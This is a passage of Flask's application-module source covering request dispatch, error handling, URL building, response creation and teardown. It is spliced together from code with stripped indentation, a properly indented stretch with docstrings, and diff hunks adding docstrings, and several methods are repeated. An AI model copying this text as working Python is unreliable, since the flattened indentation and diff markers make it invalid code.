def test_cli_runner(self, **kwargs: t.Any) -> FlaskCliRunner:
cls = self.test_cli_runner_class
if cls is None:
from .testing import FlaskCliRunner as cls
return cls(self, **kwargs) # type: ignore
def handle_http_exception(
self, ctx: AppContext, e: HTTPException
) -> HTTPException | ft.ResponseReturnValue:
# Proxy exceptions don't have error codes. We want to always return
# those unchanged as errors
if e.code is None:
return e
# RoutingExceptions are used internally to trigger routing
# actions, such as slash redirects raising RequestRedirect. They
# are not raised or handled in user code.
if isinstance(e, RoutingException):
return e
handler = self._find_error_handler(e, ctx.request.blueprints)
if handler is None:
return e
return self.ensure_sync(handler)(e) # type: ignore[no-any-return]
def handle_user_exception(
self, ctx: AppContext, e: Exception
) -> HTTPException | ft.ResponseReturnValue:
if isinstance(e, BadRequestKeyError) and (
self.debug or self.config["TRAP_BAD_REQUEST_ERRORS"]
):
e.show_exception = True
if isinstance(e, HTTPException) and not self.trap_http_exception(e):
return self.handle_http_exception(ctx, e)
handler = self._find_error_handler(e, ctx.request.blueprints)
if handler is None:
raise
return self.ensure_sync(handler)(e) # type: ignore[no-any-return]
def handle_exception(self, ctx: AppContext, e: Exception) -> Response:
exc_info = sys.exc_info()
got_request_exception.send(self, _async_wrapper=self.ensure_sync, exception=e)
propagate = self.config["PROPAGATE_EXCEPTIONS"]
if propagate is None:
propagate = self.testing or self.debug
if propagate:
# Re-raise if called with an active exception, otherwise
# raise the passed in exception.
if exc_info[1] is e:
raise
raise e
self.log_exception(ctx, exc_info)
server_error: InternalServerError | ft.ResponseReturnValue
server_error = InternalServerError(original_exception=e)
handler = self._find_error_handler(server_error, ctx.request.blueprints)
if handler is not None:
server_error = self.ensure_sync(handler)(server_error)
return self.finalize_request(ctx, server_error, from_error_handler=True)
def log_exception(
self,
ctx: AppContext,
exc_info: tuple[type, BaseException, TracebackType] | tuple[None, None, None],
) -> None:
self.logger.error(
f"Exception on {ctx.request.path} [{ctx.request.method}]", exc_info=exc_info
)
def dispatch_request(self, ctx: AppContext) -> ft.ResponseReturnValue:
req = ctx.request
if req.routing_exception is not None:
self.raise_routing_exception(req)
rule: Rule = req.url_rule # type: ignore[assignment]
# if we provide automatic options for this URL and the
# request came with the OPTIONS method, reply automatically
if (
getattr(rule, "provide_automatic_options", False)
and req.method == "OPTIONS"
):
return self.make_default_options_response(ctx)
# otherwise dispatch to the handler for that endpoint
view_args: dict[str, t.Any] = req.view_args # type: ignore[assignment]
return self.ensure_sync(self.view_functions[rule.endpoint])(**view_args) # type: ignore[no-any-return]
def full_dispatch_request(self, ctx: AppContext) -> Response:
if not self._got_first_request and self.should_ignore_error is not None:
import warnings
warnings.warn(
"The 'should_ignore_error' method is deprecated and will"
" be removed in Flask 3.3. Handle errors as needed in"
" teardown handlers instead.",
DeprecationWarning,
stacklevel=1,
)
self._got_first_request = True
try:
request_started.send(self, _async_wrapper=self.ensure_sync)
rv = self.preprocess_request(ctx)
if rv is None:
rv = self.dispatch_request(ctx)
except Exception as e:
rv = self.handle_user_exception(ctx, e)
return self.finalize_request(ctx, rv)
def finalize_request(
self,
ctx: AppContext,
rv: ft.ResponseReturnValue | HTTPException,
from_error_handler: bool = False,
) -> Response:
response = self.make_response(rv)
try:
response = self.process_response(ctx, response)
request_finished.send(
self, _async_wrapper=self.ensure_sync, response=response
)
except Exception:
if not from_error_handler:
raise
self.logger.exception(
"Request finalizing failed with an error while handling an error"
)
return response
def make_default_options_response(self, ctx: AppContext) -> Response:
methods = ctx.url_adapter.allowed_methods() # type: ignore[union-attr]
rv = self.response_class()
rv.allow.update(methods)
return rv
def ensure_sync(self, func: t.Callable[..., t.Any]) -> t.Callable[..., t.Any]:
if iscoroutinefunction(func):
return self.async_to_sync(func)
return func
def async_to_sync(
self, func: t.Callable[..., t.Coroutine[t.Any, t.Any, t.Any]]
) -> t.Callable[..., t.Any]:
try:
from asgiref.sync import async_to_sync as asgiref_async_to_sync
except ImportError:
raise RuntimeError(
"Install Flask with the 'async' extra in order to use async views."
) from None
return asgiref_async_to_sync(func)
def url_for(
self,
/,
endpoint: str,
*,
_anchor: str | None = None,
_method: str | None = None,
_scheme: str | None = None,
_external: bool | None = None,
**values: t.Any,
) -> str:
if (ctx := _cv_app.get(None)) is not None and ctx.has_request:
url_adapter = ctx.url_adapter
blueprint_name = ctx.request.blueprint
# If the endpoint starts with "." and the request matches a
# blueprint, the endpoint is relative to the blueprint.
if endpoint[:1] == ".":
if blueprint_name is not None:
endpoint = f"{blueprint_name}{endpoint}"
else:
endpoint = endpoint[1:]
# When in a request, generate a URL without scheme and
# domain by default, unless a scheme is given.
if _external is None:
_external = _scheme is not None
else:
# If called by helpers.url_for, an app context is active,
# use its url_adapter. Otherwise, app.url_for was called
# directly, build an adapter.
if ctx is not None:
url_adapter = ctx.url_adapter
else:
url_adapter = self.create_url_adapter(None)
if url_adapter is None:
raise RuntimeError(
"Unable to build URLs outside an active request"
" without 'SERVER_NAME' configured. Also configure"
" 'APPLICATION_ROOT' and 'PREFERRED_URL_SCHEME' as"
" needed."
)
# When outside a request, generate a URL with scheme and
# domain by default.
if _external is None:
_external = True
# It is an error to set _scheme when _external=False, in order
# to avoid accidental insecure URLs.
if _scheme is not None and not _external:
raise ValueError("When specifying '_scheme', '_external' must be True.")
self.inject_url_defaults(endpoint, values)
try:
rv = url_adapter.build( # type: ignore[union-attr]
endpoint,
values,
method=_method,
url_scheme=_scheme,
force_external=_external,
)
except BuildError as error:
values.update(
_anchor=_anchor, _method=_method, _scheme=_scheme, _external=_external
)
return self.handle_url_build_error(error, endpoint, values)
if _anchor is not None:
_anchor = _url_quote(_anchor, safe="%!#$&'()*+,/:;=?@")
rv = f"{rv}#{_anchor}"
return rv
    def make_response(self, rv: ft.ResponseReturnValue) -> Response:
        """Convert a view function's return value into an instance of
        :attr:`response_class`.

        Edge cases handled here:

        - A 3-tuple is unpacked as ``(body, status, headers)``. A
          2-tuple is ambiguous: if the second item is a ``Headers``,
          ``dict``, ``tuple``, or ``list`` it is treated as headers,
          otherwise as a status. Tuples of any other length raise
          ``TypeError``.
        - A ``None`` body (including a view that ended without a
          ``return``) raises ``TypeError``.
        - ``str``/``bytes``/``bytearray`` bodies and iterators are
          passed to the response class together with status/headers so
          the class can apply its own logic; status/headers are then
          cleared so they are not applied twice below.
        - ``dict`` and ``list`` bodies are serialized as JSON.
        - Other ``Response`` classes and WSGI callables are coerced via
          ``force_type``; a coercion failure is re-raised as a
          ``TypeError`` describing the offending return type.
        - A provided ``status`` overrides the response's status:
          string-like values set :attr:`~Response.status`, integers set
          :attr:`~Response.status_code`.
        - Provided ``headers`` extend (not replace) existing headers.

        :param rv: the return value from the view function.
        :raises TypeError: if the return value is not a valid response.
        """
        status: int | None = None
        headers: HeadersValue | None = None
        # unpack tuple returns
        if isinstance(rv, tuple):
            len_rv = len(rv)
            # a 3-tuple is unpacked directly
            if len_rv == 3:
                rv, status, headers = rv  # type: ignore[misc]
            # decide if a 2-tuple has status or headers
            elif len_rv == 2:
                if isinstance(rv[1], (Headers, dict, tuple, list)):
                    rv, headers = rv  # pyright: ignore
                else:
                    rv, status = rv  # type: ignore[assignment,misc]
            # other sized tuples are not allowed
            else:
                raise TypeError(
                    "The view function did not return a valid response tuple."
                    " The tuple must have the form (body, status, headers),"
                    " (body, status), or (body, headers)."
                )
        # the body must not be None
        if rv is None:
            raise TypeError(
                f"The view function for {request.endpoint!r} did not"
                " return a valid response. The function either returned"
                " None or ended without a return statement."
            )
        # make sure the body is an instance of the response class
        if not isinstance(rv, self.response_class):
            if isinstance(rv, (str, bytes, bytearray)) or isinstance(rv, cabc.Iterator):
                # let the response class set the status and headers instead of
                # waiting to do it manually, so that the class can handle any
                # special logic
                rv = self.response_class(
                    rv,  # pyright: ignore
                    status=status,
                    headers=headers,  # type: ignore[arg-type]
                )
                status = headers = None
            elif isinstance(rv, (dict, list)):
                rv = self.json.response(rv)
            elif isinstance(rv, BaseResponse) or callable(rv):
                # evaluate a WSGI callable, or coerce a different response
                # class to the correct type
                try:
                    rv = self.response_class.force_type(
                        rv,  # type: ignore[arg-type]
                        request.environ,
                    )
                except TypeError as e:
                    raise TypeError(
                        f"{e}\nThe view function did not return a valid"
                        " response. The return type must be a string,"
                        " dict, list, tuple with headers or status,"
                        " Response instance, or WSGI callable, but it"
                        f" was a {type(rv).__name__}."
                    ).with_traceback(sys.exc_info()[2]) from None
            else:
                raise TypeError(
                    "The view function did not return a valid"
                    " response. The return type must be a string,"
                    " dict, list, tuple with headers or status,"
                    " Response instance, or WSGI callable, but it was a"
                    f" {type(rv).__name__}."
                )
        rv = t.cast(Response, rv)
        # prefer the status if it was provided
        if status is not None:
            if isinstance(status, (str, bytes, bytearray)):
                rv.status = status
            else:
                rv.status_code = status
        # extend existing headers with provided headers
        if headers:
            rv.headers.update(headers)
        return rv
    def preprocess_request(self, ctx: AppContext) -> ft.ResponseReturnValue | None:
        """Run URL value preprocessors and ``before_request`` functions
        for the current request.

        Functions registered at the app level (key ``None``) run before
        those registered on the request's blueprints (iterated in
        reverse of ``request.blueprints``).

        Edge case: if any ``before_request`` function returns a value
        that is not ``None``, that value is returned immediately and
        treated as if it were the view's return value — the remaining
        ``before_request`` functions and the view itself are skipped.

        :param ctx: the active app context for this request.
        :return: a response value that short-circuits dispatch, or
            ``None`` to continue normal handling.
        """
        req = ctx.request
        names = (None, *reversed(req.blueprints))
        for name in names:
            if name in self.url_value_preprocessors:
                for url_func in self.url_value_preprocessors[name]:
                    url_func(req.endpoint, req.view_args)
        for name in names:
            if name in self.before_request_funcs:
                for before_func in self.before_request_funcs[name]:
                    rv = self.ensure_sync(before_func)()
                    if rv is not None:
                        return rv  # type: ignore[no-any-return]
        return None
    def process_response(self, ctx: AppContext, response: Response) -> Response:
        """Modify the response object before it is sent to the WSGI
        server by running all ``after_request`` functions.

        Order: per-request functions registered on the context run
        first, then ``after_request`` functions for each blueprint that
        handled the request followed by app-level functions (key
        ``None``), each group in reverse registration order. Every
        function may return a replacement response object.

        Edge case: the session is only saved if it is not a null
        session, so apps without a configured session backend do not
        attempt (and fail) to persist one.

        :param response: the response object to finalize.
        :return: the (possibly replaced) response object.
        """
        for func in ctx._after_request_functions:
            response = self.ensure_sync(func)(response)
        for name in chain(ctx.request.blueprints, (None,)):
            if name in self.after_request_funcs:
                for func in reversed(self.after_request_funcs[name]):
                    response = self.ensure_sync(func)(response)
        if not self.session_interface.is_null_session(ctx._get_session()):
            self.session_interface.save_session(self, ctx._get_session(), response)
        return response
    def do_teardown_request(
        self, ctx: AppContext, exc: BaseException | None = None
    ) -> None:
        """Run ``teardown_request`` functions and send the
        :data:`request_tearing_down` signal.

        Edge cases: each callback runs inside a ``_CollectErrors``
        guard, so an exception in one teardown function does not
        prevent the remaining functions (or the signal) from running —
        collected errors are re-raised together at the end. Blueprint
        teardown functions run before app-level ones, each group in
        reverse registration order.

        :param exc: an unhandled exception raised while dispatching the
            request, or ``None``; passed to every teardown function.
        """
        collect_errors = _CollectErrors()
        for name in chain(ctx.request.blueprints, (None,)):
            if name in self.teardown_request_funcs:
                for func in reversed(self.teardown_request_funcs[name]):
                    with collect_errors:
                        self.ensure_sync(func)(exc)
        with collect_errors:
            request_tearing_down.send(self, _async_wrapper=self.ensure_sync, exc=exc)
        collect_errors.raise_any("Errors during request teardown")
    def do_teardown_appcontext(
        self, ctx: AppContext, exc: BaseException | None = None
    ) -> None:
        """Run ``teardown_appcontext`` functions and send the
        :data:`appcontext_tearing_down` signal.

        Edge case: as with request teardown, every callback runs inside
        a ``_CollectErrors`` guard so a failure in one function does not
        stop the others or the signal; collected errors are re-raised
        together afterwards. Functions run in reverse registration
        order.

        :param exc: an unhandled exception from the context's lifetime,
            or ``None``; passed to every teardown function.
        """
        collect_errors = _CollectErrors()
        for func in reversed(self.teardown_appcontext_funcs):
            with collect_errors:
                self.ensure_sync(func)(exc)
        with collect_errors:
            appcontext_tearing_down.send(self, _async_wrapper=self.ensure_sync, exc=exc)
        collect_errors.raise_any("Errors during app teardown")
    def app_context(self) -> AppContext:
        """Create an :class:`AppContext` for this application without an
        associated request. Use as a context manager (``with
        app.app_context():``) to make ``current_app`` and ``g``
        available outside a request, e.g. in CLI commands or tests.
        """
        return AppContext(self)
    def request_context(self, environ: WSGIEnvironment) -> AppContext:
        """Create an :class:`AppContext` bound to a request built from
        the given WSGI environment.

        :param environ: a WSGI environment dict describing the request.
        """
        return AppContext.from_environ(self, environ)
    def test_request_context(self, *args: t.Any, **kwargs: t.Any) -> AppContext:
        """Create a request context from arguments describing a fake
        request, for use in tests.

        Edge case: the ``EnvironBuilder`` is always closed in a
        ``finally`` block, so its resources are released even if
        building the environ raises.

        :param args: positional arguments passed to
            :class:`~flask.testing.EnvironBuilder`.
        :param kwargs: keyword arguments passed to
            :class:`~flask.testing.EnvironBuilder`.
        """
        from .testing import EnvironBuilder

        builder = EnvironBuilder(self, *args, **kwargs)
        try:
            environ = builder.get_environ()
        finally:
            builder.close()
        return self.request_context(environ)
    def wsgi_app(
        self, environ: WSGIEnvironment, start_response: StartResponse
    ) -> cabc.Iterable[bytes]:
        """The actual WSGI application, dispatching a single request
        within a pushed app context.

        Edge cases handled here:

        - Any ``Exception`` during dispatch is converted to an error
          response via :meth:`handle_exception`; the original exception
          is remembered so teardown functions receive it.
        - A non-``Exception`` ``BaseException`` (e.g.
          ``KeyboardInterrupt``) is recorded for teardown but
          re-raised rather than converted to a response.
        - The ``finally`` block always pops the context, so teardown
          runs even when dispatch or response creation fails.
        - If the Werkzeug debugger placed a
          ``werkzeug.debug.preserve_context`` callable in the environ,
          the context is handed to it so the debugger can inspect it
          after the request.
        - If :attr:`should_ignore_error` says the error should be
          ignored, ``None`` is passed to ``ctx.pop`` instead of the
          exception.

        :param environ: a WSGI environment.
        :param start_response: a callable accepting a status code, a
            list of headers, and an optional exception context.
        """
        ctx = self.request_context(environ)
        error: BaseException | None = None
        try:
            try:
                ctx.push()
                response = self.full_dispatch_request(ctx)
            except Exception as e:
                error = e
                response = self.handle_exception(ctx, e)
            except:
                error = sys.exc_info()[1]
                raise
            return response(environ, start_response)
        finally:
            if "werkzeug.debug.preserve_context" in environ:
                environ["werkzeug.debug.preserve_context"](ctx)
            if (
                error is not None
                and self.should_ignore_error is not None
                and self.should_ignore_error(error)
            ):
                error = None
            ctx.pop(error)
    def __call__(
        self, environ: WSGIEnvironment, start_response: StartResponse
    ) -> cabc.Iterable[bytes]:
        """The WSGI server calls the app object as the WSGI
        application. This delegates to :meth:`wsgi_app`, which can be
        wrapped to apply middleware (``app.wsgi_app = mw(app.wsgi_app)``)
        without losing a reference to the app object itself.
        """
        return self.wsgi_app(environ, start_response)
class Flask(App):
+ """The flask object implements a WSGI application and acts as the central
+ object. It is passed the name of the module or package of the
+ application. Once it is created it will act as a central registry for
+ the view functions, the URL rules, template configuration and much more.
+
+ The name of the package is used to resolve resources from inside the
+ package or the folder the module is contained in depending on if the
+ package parameter resolves to an actual python package (a folder with
+ an :file:`__init__.py` file inside) or a standard module (just a ``.py`` file).
+
+ For more information about resource loading, see :func:`open_resource`.
+
+ Usually you create a :class:`Flask` instance in your main module or
+ in the :file:`__init__.py` file of your package like this::
+
+ from flask import Flask
+ app = Flask(__name__)
+
+ .. admonition:: About the First Parameter
+
+ The idea of the first parameter is to give Flask an idea of what
+ belongs to your application. This name is used to find resources
+ on the filesystem, can be used by extensions to improve debugging
+ information and a lot more.
+
+ So it's important what you provide there. If you are using a single
+ module, `__name__` is always the correct value. If you however are
+ using a package, it's usually recommended to hardcode the name of
+ your package there.
+
+ For example if your application is defined in :file:`yourapplication/app.py`
+ you should create it with one of the two versions below::
+
+ app = Flask('yourapplication')
+ app = Flask(__name__.split('.')[0])
+
+ Why is that? The application will work even with `__name__`, thanks
+ to how resources are looked up. However it will make debugging more
+ painful. Certain extensions can make assumptions based on the
+ import name of your application. For example the Flask-SQLAlchemy
+ extension will look for the code in your application that triggered
+ an SQL query in debug mode. If the import name is not properly set
+ up, that debugging information is lost. (For example it would only
+ pick up SQL queries in `yourapplication.app` and not
+ `yourapplication.views.frontend`)
+
+ .. versionadded:: 0.7
+ The `static_url_path`, `static_folder`, and `template_folder`
+ parameters were added.
+
+ .. versionadded:: 0.8
+ The `instance_path` and `instance_relative_config` parameters were
+ added.
+
+ .. versionadded:: 0.11
+ The `root_path` parameter was added.
+
+ .. versionadded:: 1.0
+ The ``host_matching`` and ``static_host`` parameters were added.
+
+ .. versionadded:: 1.0
+ The ``subdomain_matching`` parameter was added. Subdomain
+ matching needs to be enabled manually now. Setting
+ :data:`SERVER_NAME` does not implicitly enable it.
+
+ :param import_name: the name of the application package
+ :param static_url_path: can be used to specify a different path for the
+ static files on the web. Defaults to the name
+ of the `static_folder` folder.
+ :param static_folder: The folder with static files that is served at
+ ``static_url_path``. Relative to the application ``root_path``
+ or an absolute path. Defaults to ``'static'``.
+ :param static_host: the host to use when adding the static route.
+ Defaults to None. Required when using ``host_matching=True``
+ with a ``static_folder`` configured.
+ :param host_matching: set ``url_map.host_matching`` attribute.
+ Defaults to False.
+ :param subdomain_matching: consider the subdomain relative to
+ :data:`SERVER_NAME` when matching routes. Defaults to False.
+ :param template_folder: the folder that contains the templates that should
+ be used by the application. Defaults to
+ ``'templates'`` folder in the root path of the
+ application.
+ :param instance_path: An alternative instance path for the application.
+ By default the folder ``'instance'`` next to the
+ package or module is assumed to be the instance
+ path.
+ :param instance_relative_config: if set to ``True`` relative filenames
+ for loading the config are assumed to
+ be relative to the instance path instead
+ of the application root.
+ :param root_path: The path to the root of the application files.
+ This should only be set manually when it can't be detected
+ automatically, such as for namespace packages.
+ """
default_config = ImmutableDict(
{
@@ -268,6 +363,22 @@ )
def get_send_file_max_age(self, filename: str | None) -> int | None:
+ """Used by :func:`send_file` to determine the ``max_age`` cache
+ value for a given file path if it wasn't passed.
+
+ By default, this returns :data:`SEND_FILE_MAX_AGE_DEFAULT` from
+ the configuration of :data:`~flask.current_app`. This defaults
+ to ``None``, which tells the browser to use conditional requests
+ instead of a timed cache, which is usually preferable.
+
+ Note this is a duplicate of the same method in the Flask
+ class.
+
+ .. versionchanged:: 2.0
+ The default configuration is ``None`` instead of 12 hours.
+
+ .. versionadded:: 0.9
+ """
value = self.config["SEND_FILE_MAX_AGE_DEFAULT"]
if value is None:
@@ -279,6 +390,17 @@ return value # type: ignore[no-any-return]
def send_static_file(self, filename: str) -> Response:
+ """The view function used to serve files from
+ :attr:`static_folder`. A route is automatically registered for
+ this view at :attr:`static_url_path` if :attr:`static_folder` is
+ set.
+
+ Note this is a duplicate of the same method in the Flask
+ class.
+
+ .. versionadded:: 0.5
+
+ """
if not self.has_static_folder:
raise RuntimeError("'static_folder' must be set to serve static_files.")
@@ -292,6 +414,26 @@ def open_resource(
self, resource: str, mode: str = "rb", encoding: str | None = None
) -> t.IO[t.AnyStr]:
+ """Open a resource file relative to :attr:`root_path` for reading.
+
+ For example, if the file ``schema.sql`` is next to the file
+ ``app.py`` where the ``Flask`` app is defined, it can be opened
+ with:
+
+ .. code-block:: python
+
+ with app.open_resource("schema.sql") as f:
+ conn.executescript(f.read())
+
+ :param resource: Path to the resource relative to :attr:`root_path`.
+ :param mode: Open the file in this mode. Only reading is supported,
+ valid values are ``"r"`` (or ``"rt"``) and ``"rb"``.
+ :param encoding: Open the file with this encoding when opening in text
+ mode. This is ignored when opening in binary mode.
+
+ .. versionchanged:: 3.1
+ Added the ``encoding`` parameter.
+ """
if mode not in {"r", "rt", "rb"}:
raise ValueError("Resources can only be opened for reading.")
@@ -305,6 +447,18 @@ def open_instance_resource(
self, resource: str, mode: str = "rb", encoding: str | None = "utf-8"
) -> t.IO[t.AnyStr]:
+ """Open a resource file relative to the application's instance folder
+ :attr:`instance_path`. Unlike :meth:`open_resource`, files in the
+ instance folder can be opened for writing.
+
+ :param resource: Path to the resource relative to :attr:`instance_path`.
+ :param mode: Open the file in this mode.
+ :param encoding: Open the file with this encoding when opening in text
+ mode. This is ignored when opening in binary mode.
+
+ .. versionchanged:: 3.1
+ Added the ``encoding`` parameter.
+ """
path = os.path.join(self.instance_path, resource)
if "b" in mode:
@@ -313,6 +467,17 @@ return open(path, mode, encoding=encoding)
def create_jinja_environment(self) -> Environment:
+ """Create the Jinja environment based on :attr:`jinja_options`
+ and the various Jinja-related methods of the app. Changing
+ :attr:`jinja_options` after this will have no effect. Also adds
+ Flask-related globals and filters to the environment.
+
+ .. versionchanged:: 0.11
+ ``Environment.auto_reload`` set in accordance with
+ ``TEMPLATES_AUTO_RELOAD`` configuration option.
+
+ .. versionadded:: 0.5
+ """
options = dict(self.jinja_options)
if "autoescape" not in options:
@@ -342,6 +507,25 @@ return rv
def create_url_adapter(self, request: Request | None) -> MapAdapter | None:
+ """Creates a URL adapter for the given request. The URL adapter
+ is created at a point where the request context is not yet set
+ up so the request is passed explicitly.
+
+ .. versionchanged:: 3.1
+ If :data:`SERVER_NAME` is set, it does not restrict requests to
+ only that domain, for both ``subdomain_matching`` and
+ ``host_matching``.
+
+ .. versionchanged:: 1.0
+ :data:`SERVER_NAME` no longer implicitly enables subdomain
+ matching. Use :attr:`subdomain_matching` instead.
+
+ .. versionchanged:: 0.9
+ This can be called outside a request when the URL adapter is created
+ for an application context.
+
+ .. versionadded:: 0.6
+ """
if request is not None:
if (trusted_hosts := self.config["TRUSTED_HOSTS"]) is not None:
request.trusted_hosts = trusted_hosts
@@ -376,6 +560,21 @@ return None
def raise_routing_exception(self, request: Request) -> t.NoReturn:
+ """Intercept routing exceptions and possibly do something else.
+
+ In debug mode, intercept a routing redirect and replace it with
+ an error if the body will be discarded.
+
+ With modern Werkzeug this shouldn't occur, since it now uses a
+ 308 status which tells the browser to resend the method and
+ body.
+
+ .. versionchanged:: 2.1
+ Don't intercept 307 and 308 redirects.
+
+ :meta private:
+ :internal:
+ """
if (
not self.debug
or not isinstance(request.routing_exception, RequestRedirect)
@@ -391,6 +590,16 @@ def update_template_context(
self, ctx: AppContext, context: dict[str, t.Any]
) -> None:
+ """Update the template context with some commonly used variables.
+ This injects request, session, config and g into the template
+ context as well as everything template context processors want
+ to inject. Note that the as of Flask 0.6, the original values
+ in the context will not be overridden if a context processor
+ decides to return a value with the same key.
+
+ :param context: the context as a dictionary that is updated in place
+ to add extra variables.
+ """
names: t.Iterable[str | None] = (None,)
# A template may be rendered outside a request context.
@@ -409,6 +618,12 @@ context.update(orig_ctx)
def make_shell_context(self) -> dict[str, t.Any]:
+ """Returns the shell context for an interactive shell for this
+ application. This runs all the registered shell context
+ processors.
+
+ .. versionadded:: 0.11
+ """
rv = {"app": self, "g": g}
for processor in self.shell_context_processors:
rv.update(processor())
@@ -422,6 +637,61 @@ load_dotenv: bool = True,
**options: t.Any,
) -> None:
+ """Runs the application on a local development server.
+
+ Do not use ``run()`` in a production setting. It is not intended to
+ meet security and performance requirements for a production server.
+ Instead, see :doc:`/deploying/index` for WSGI server recommendations.
+
+ If the :attr:`debug` flag is set the server will automatically reload
+ for code changes and show a debugger in case an exception happened.
+
+ If you want to run the application in debug mode, but disable the
+ code execution on the interactive debugger, you can pass
+ ``use_evalex=False`` as parameter. This will keep the debugger's
+ traceback screen active, but disable code execution.
+
+ It is not recommended to use this function for development with
+ automatic reloading as this is badly supported. Instead you should
+ be using the :command:`flask` command line script's ``run`` support.
+
+ .. admonition:: Keep in Mind
+
+ Flask will suppress any server error with a generic error page
+ unless it is in debug mode. As such to enable just the
+ interactive debugger without the code reloading, you have to
+ invoke :meth:`run` with ``debug=True`` and ``use_reloader=False``.
+ Setting ``use_debugger`` to ``True`` without being in debug mode
+ won't catch any exceptions because there won't be any to
+ catch.
+
+ :param host: the hostname to listen on. Set this to ``'0.0.0.0'`` to
+ have the server available externally as well. Defaults to
+ ``'127.0.0.1'`` or the host in the ``SERVER_NAME`` config variable
+ if present.
+ :param port: the port of the webserver. Defaults to ``5000`` or the
+ port defined in the ``SERVER_NAME`` config variable if present.
+ :param debug: if given, enable or disable debug mode. See
+ :attr:`debug`.
+ :param load_dotenv: Load the nearest :file:`.env` and :file:`.flaskenv`
+ files to set environment variables. Will also change the working
+ directory to the directory containing the first file found.
+ :param options: the options to be forwarded to the underlying Werkzeug
+ server. See :func:`werkzeug.serving.run_simple` for more
+ information.
+
+ .. versionchanged:: 1.0
+ If installed, python-dotenv will be used to load environment
+ variables from :file:`.env` and :file:`.flaskenv` files.
+
+ The :envvar:`FLASK_DEBUG` environment variable will override :attr:`debug`.
+
+ Threaded mode is enabled by default.
+
+ .. versionchanged:: 0.10
+ The default port is now picked from the ``SERVER_NAME``
+ variable.
+ """
# Ignore this call so that it doesn't start another server if
# the 'flask run' command is used.
if os.environ.get("FLASK_RUN_FROM_CLI") == "true":
@@ -483,6 +753,56 @@ self._got_first_request = False
def test_client(self, use_cookies: bool = True, **kwargs: t.Any) -> FlaskClient:
+ """Creates a test client for this application. For information
+ about unit testing head over to :doc:`/testing`.
+
+ Note that if you are testing for assertions or exceptions in your
+ application code, you must set ``app.testing = True`` in order for the
+ exceptions to propagate to the test client. Otherwise, the exception
+ will be handled by the application (not visible to the test client) and
+ the only indication of an AssertionError or other exception will be a
+ 500 status code response to the test client. See the :attr:`testing`
+ attribute. For example::
+
+ app.testing = True
+ client = app.test_client()
+
+ The test client can be used in a ``with`` block to defer the closing down
+ of the context until the end of the ``with`` block. This is useful if
+ you want to access the context locals for testing::
+
+ with app.test_client() as c:
+ rv = c.get('/?vodka=42')
+ assert request.args['vodka'] == '42'
+
+ Additionally, you may pass optional keyword arguments that will then
+ be passed to the application's :attr:`test_client_class` constructor.
+ For example::
+
+ from flask.testing import FlaskClient
+
+ class CustomClient(FlaskClient):
+ def __init__(self, *args, **kwargs):
+ self._authentication = kwargs.pop("authentication")
+ super(CustomClient,self).__init__( *args, **kwargs)
+
+ app.test_client_class = CustomClient
+ client = app.test_client(authentication='Basic ....')
+
+ See :class:`~flask.testing.FlaskClient` for more information.
+
+ .. versionchanged:: 0.4
+ added support for ``with`` block usage for the client.
+
+ .. versionadded:: 0.7
+ The `use_cookies` parameter was added as well as the ability
+ to override the client to be used by setting the
+ :attr:`test_client_class` attribute.
+
+ .. versionchanged:: 0.11
+ Added `**kwargs` to support passing additional keyword arguments to
+ the constructor of :attr:`test_client_class`.
+ """
cls = self.test_client_class
if cls is None:
from .testing import FlaskClient as cls
@@ -491,6 +811,15 @@ )
def test_cli_runner(self, **kwargs: t.Any) -> FlaskCliRunner:
+ """Create a CLI runner for testing CLI commands.
+ See :ref:`testing-cli`.
+
+ Returns an instance of :attr:`test_cli_runner_class`, by default
+ :class:`~flask.testing.FlaskCliRunner`. The Flask app object is
+ passed as the first argument.
+
+ .. versionadded:: 1.0
+ """
cls = self.test_cli_runner_class
if cls is None:
@@ -501,6 +830,22 @@ def handle_http_exception(
self, ctx: AppContext, e: HTTPException
) -> HTTPException | ft.ResponseReturnValue:
+ """Handles an HTTP exception. By default this will invoke the
+ registered error handlers and fall back to returning the
+ exception as response.
+
+ .. versionchanged:: 1.0.3
+ ``RoutingException``, used internally for actions such as
+ slash redirects during routing, is not passed to error
+ handlers.
+
+ .. versionchanged:: 1.0
+ Exceptions are looked up by code *and* by MRO, so
+ ``HTTPException`` subclasses can be handled with a catch-all
+ handler for the base ``HTTPException``.
+
+ .. versionadded:: 0.3
+ """
# Proxy exceptions don't have error codes. We want to always return
# those unchanged as errors
if e.code is None:
@@ -520,6 +865,20 @@ def handle_user_exception(
self, ctx: AppContext, e: Exception
) -> HTTPException | ft.ResponseReturnValue:
+ """This method is called whenever an exception occurs that
+ should be handled. A special case is :class:`~werkzeug
+ .exceptions.HTTPException` which is forwarded to the
+ :meth:`handle_http_exception` method. This function will either
+ return a response value or reraise the exception with the same
+ traceback.
+
+ .. versionchanged:: 1.0
+ Key errors raised from request data like ``form`` show the
+ bad key in debug mode rather than a generic bad request
+ message.
+
+ .. versionadded:: 0.7
+ """
if isinstance(e, BadRequestKeyError) and (
self.debug or self.config["TRAP_BAD_REQUEST_ERRORS"]
):
@@ -536,6 +895,33 @@ return self.ensure_sync(handler)(e) # type: ignore[no-any-return]
def handle_exception(self, ctx: AppContext, e: Exception) -> Response:
+ """Handle an exception that did not have an error handler
+ associated with it, or that was raised from an error handler.
+ This always causes a 500 ``InternalServerError``.
+
+ Always sends the :data:`got_request_exception` signal.
+
+ If :data:`PROPAGATE_EXCEPTIONS` is ``True``, such as in debug
+ mode, the error will be re-raised so that the debugger can
+ display it. Otherwise, the original exception is logged, and
+ an :exc:`~werkzeug.exceptions.InternalServerError` is returned.
+
+ If an error handler is registered for ``InternalServerError`` or
+ ``500``, it will be used. For consistency, the handler will
+ always receive the ``InternalServerError``. The original
+ unhandled exception is available as ``e.original_exception``.
+
+ .. versionchanged:: 1.1.0
+ Always passes the ``InternalServerError`` instance to the
+ handler, setting ``original_exception`` to the unhandled
+ error.
+
+ .. versionchanged:: 1.1.0
+ ``after_request`` functions and other finalization is done
+ even for the default 500 response when there is no handler.
+
+ .. versionadded:: 0.3
+ """
exc_info = sys.exc_info()
got_request_exception.send(self, _async_wrapper=self.ensure_sync, exception=e)
propagate = self.config["PROPAGATE_EXCEPTIONS"]
@@ -566,11 +952,27 @@ ctx: AppContext,
exc_info: tuple[type, BaseException, TracebackType] | tuple[None, None, None],
) -> None:
+ """Logs an exception. This is called by :meth:`handle_exception`
+ if debugging is disabled and right before the handler is called.
+ The default implementation logs the exception as error on the
+ :attr:`logger`.
+
+ .. versionadded:: 0.8
+ """
self.logger.error(
f"Exception on {ctx.request.path} [{ctx.request.method}]", exc_info=exc_info
)
def dispatch_request(self, ctx: AppContext) -> ft.ResponseReturnValue:
